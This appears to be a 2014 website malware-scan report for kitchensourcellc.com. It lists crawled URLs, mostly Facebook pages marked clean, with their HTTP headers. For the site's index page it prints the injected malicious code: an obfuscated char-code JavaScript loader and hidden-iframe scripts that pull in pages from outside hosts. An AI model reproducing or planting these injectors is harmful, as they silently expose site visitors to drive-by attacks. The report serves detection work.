Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kitchensourcellc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kitchensourcellc.com/ | HTTP/1.1 200 OK Date: Wed, 04 Jun 2014 07:23:06 GMT Accept-Ranges: bytes ETag: "7a5fcdf4226cd1:369" Server: Microsoft-IIS/6.0 Content-Length: 96903 Content-Location: http://kitchensourcellc.com/index.htm Content-Type: text/html Last-Modified: Sun, 29 Apr 2012 20:01:33 GMT X-Powered-By: ASP.NET | clean |
http://kitchensourcellc.com/index.htm | 200 OK Content-Length: 96903 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);
Decoded script: ...[3562 bytes skipped]... 60,116,16,76,104,36,80,48,140,48,48,164,152,68,32,48,80,112,160,192,80,152,120,192,48,160,188,160,148,136,160,116,16,72,72,72,88,108,84,32,60,80,52,48,104,120,80,48,124,172,80,60,80,52,48,36,156,180,56,100,120,92,100,60,80,112,160,68,108,88,180,160,116,40,136,28,104,100,64,64,80,52,88,0,192,152,172,88,112,76,116,16,72,72,96] if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wormetal.com/count29.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wormetal.com/count29.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } if (document.getElementsByTagNa ...[700 bytes skipped]... Antivirus reports:
Malicious iFrame found. The same iFrame was found in 3 websites. size: 0x0 src: http://winupdate.phpnet.us/main.php?site=2 This URL is marked by Google as suspicious <iframe src="http://winupdate.phpnet.us/main.php?site=2" width="0" height="0" frameborder="0"> | ||
http://kitchensourcellc.com/media/system/js/caption.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://kitchensourcellc.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.kitchensourcedesigns.com/templates/ja_kyanite_ii/js/ja.script.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Jun 2014 07:23:14 GMT Accept-Ranges: bytes Location: http://www.facebook.com/kitchensourcellctemplates/ja_kyanite_ii/js/ja.script.js Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 X-Cache: SGCACHE-MISS X-Forwarded-For: 78.158.11.226 | clean |
http://www.facebook.com/kitchensourcellctemplates/ja_kyanite_ii/js/ja.script.js | 404 Not Found Content-Length: 72 Content-Type: text/html | clean |
http://www.facebook.com/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:14 GMT Pragma: no-cache Content-Length: 747 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=YsmOU_yTdWwg4_LDMEiLpqXP; expires=Fri, 03-Jun-2016 07:23:14 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: OJ7dAKDsVkr0cJ0e27vdImbSSE7C6+J20N2296CzZsc= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:15 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=YsmOU8syl5oAwm7JVpv4cIn_; expires=Fri, 03-Jun-2016 07:23:14 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: Dvt1PHEITdr/ow4u810cqvF5XAO0rABktKyMaJ4ip0g= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/?_fb_noscript=1 | 200 OK Content-Length: 44798 Content-Type: text/html | clean |
https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/r/KJawoQmuGLs.js | 200 OK Content-Length: 92197 Content-Type: application/x-javascript | clean |
https://www.facebook.com/recover/initiate | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:16 GMT Pragma: no-cache Content-Length: 817 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZMmOUwhe4yYJG1sEHY8kLp8_; expires=Fri, 03-Jun-2016 07:23:16 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: D2b6o/Dq8wJSQ49jKEwmUV0pVRntspG2O3rTrL59e1I= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZMmOU2prxk0AM7gUnJ43DThJ; expires=Fri, 03-Jun-2016 07:23:16 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: VJfuJ7WfF+MNUhuDE8mWU3LJF7rmrrFJGbbyW6DVBAs= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZMmOU-iPjjqMxm7D3UBWXcM5; expires=Fri, 03-Jun-2016 07:23:16 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: udALgprphr1pcNqmuTIrm5i+0bcyT+IcmfbVUYjZohM= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZcmOUyN0elbnTjRnF_oxc2Fn; expires=Fri, 03-Jun-2016 07:23:17 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 71lTgypib5+mWN2ZWzDDRLLVhK7YKXOduImLAbr/iHk= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZcmOU__qzhGSk1fi-pgDjHPJ; expires=Fri, 03-Jun-2016 07:23:17 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: tHPvXHFISFCz7PoOGvF3YN9VbNuVL+j+j3q8yiwa560= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZcmOU2FxNyjXcfgOVeUDCLDu; expires=Fri, 03-Jun-2016 07:23:17 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: RviXlWgzZ1qIZVndAxcPbei30RRm0ZSL0Thg6KPtwaY= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/terms | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:17 GMT Pragma: no-cache Content-Length: 775 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=ZcmOU8mUfgTGnF4AIVp_HJoZ; expires=Fri, 03-Jun-2016 07:23:17 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: EhtUTmp/pAfUCrKLiZYYDhw3TJA1KVdDg8PfH0LXTWM= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/terms | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:18 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=ZsmOU1tZcA2pNSDYRk4X6jDS; expires=Fri, 03-Jun-2016 07:23:18 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: Hs2PBI/OVceGu9NtN4k9dMzAe8NUjuq2QTsgKUFh0k8= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/terms?_fb_noscript=1 | 200 OK Content-Length: 62715 Content-Type: text/html | clean |
https://www.facebook.com/r.php?locale=lt_LT | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:19 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_LT; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=Z8mOUyCKNldx5KaqpiCN5PlY; expires=Fri, 03-Jun-2016 07:23:19 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 64nPk5cPdyokqxB8CvBNoBMQBljv0zh5TBZfTfLvBCA= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:19 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=Z8mOUzXMilcoksOM5bCcTp_e; expires=Fri, 03-Jun-2016 07:23:19 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: +3mVyZ7DbfMCzplsRxo26OXFQSWefRorGdhlBQP/7UA= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:19 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=Z8mOUxmNAoRE72HeBaXJKiNr; expires=Fri, 03-Jun-2016 07:23:19 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: qbvAyLc2QMeZ1ChsruV9KpwS8sUQtXt5c+6dN0wJor4= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:20 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=aMmOU0OlfdBMezV8wFqsVA_W; expires=Fri, 03-Jun-2016 07:23:20 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 5NXS8bJ9JzGjWKTFwhgimGalOLrl2WaPWyuIJicndqo= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:20 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=aMmOUw1UfgW6iWv9_AJSSJzv; expires=Fri, 03-Jun-2016 07:23:20 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: wb1KuABn9rmuItGCJ5nXF4DpskBnBNOjr9nSJRl7ddI= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:21 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=aMmOU4h8Kh5c2fSAJtJllQJC; expires=Fri, 03-Jun-2016 07:23:20 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: qmCfO+pTNQVYu5kOJGKf+O2qtptNVP1W5McWNIw7nBQ= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:21 GMT Pragma: no-cache Content-Length: 783 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=acmOUylGSg_r2OCTjZhCXMh_; expires=Fri, 03-Jun-2016 07:23:21 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 4tReBSaB/5rPFRXeIsUylrXDjCDOxRBmu4kGyEH5JFg= X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.facebook.com/legal/copyright.php | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:21 GMT Pragma: no-cache Content-Length: 797 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=acmOU5g3ucTbCDVo6nqnWZeK; expires=Fri, 03-Jun-2016 07:23:21 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: hIh7NZAZX6zbsYX/RDan85x5T9cIhTd2tTEzx23Fz4A= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/copyright.php | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:21 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=acmOU4PVgG3UPTkvAY-e-ECM; expires=Fri, 03-Jun-2016 07:23:21 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: BbLcoxOpXjMgbPUHwcvIKremd/6bZQwuBECu0H/X7EA= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/copyright.php?_fb_noscript=1 | 200 OK Content-Length: 32412 Content-Type: text/html | clean |
https://www.facebook.com/legal/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:22 GMT Pragma: no-cache Content-Length: 785 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=asmOUxcyVqCutWP8nBHGNpNw; expires=Fri, 03-Jun-2016 07:23:22 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: V+E3HOJkFfnrkta4g0fJXeRSzDTVpqKRZvNkJhV2XuU= X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.facebook.com/help/community/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:23 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=asmOUyBM2qZJAOd-01SpGn0U; expires=Fri, 03-Jun-2016 07:23:22 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: RfM4q+sHkNFLSASz6q4PfmdJE3Rq/dglsNW6aWo1k2k= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help/community/?_fb_noscript=1 | 200 OK Content-Length: 109773 Content-Type: text/html | clean |
http://static.ak.fbcdn.net/rsrc.php/v2/yx/r/KJawoQmuGLs.js | 200 OK Content-Length: 92196 Content-Type: application/x-javascript | clean |
http://www.facebook.com/help | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:26 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=bsmOU_Lz2CWLtLMLKOhDXEch; expires=Fri, 03-Jun-2016 07:23:26 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: yXPPXTXOall88jdJw5/Xo/1+BRPk6Szn2seteDUdz2Y= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help?_fb_noscript=1 | 200 OK Content-Length: 48053 Content-Type: text/html | clean |
http://www.facebook.com/help/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Wed, 04 Jun 2014 07:23:27 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com Set-Cookie: datr=b8mOU_B7KAfDbie4Qh9uH55K; expires=Fri, 03-Jun-2016 07:23:27 GMT; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: KgcCiqeGyVlplJAF8mzSZUiuEVnOeXtXETaBioy+I9k= X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/help/?_fb_noscript=1 | 200 OK Content-Length: 48062 Content-Type: text/html | clean |
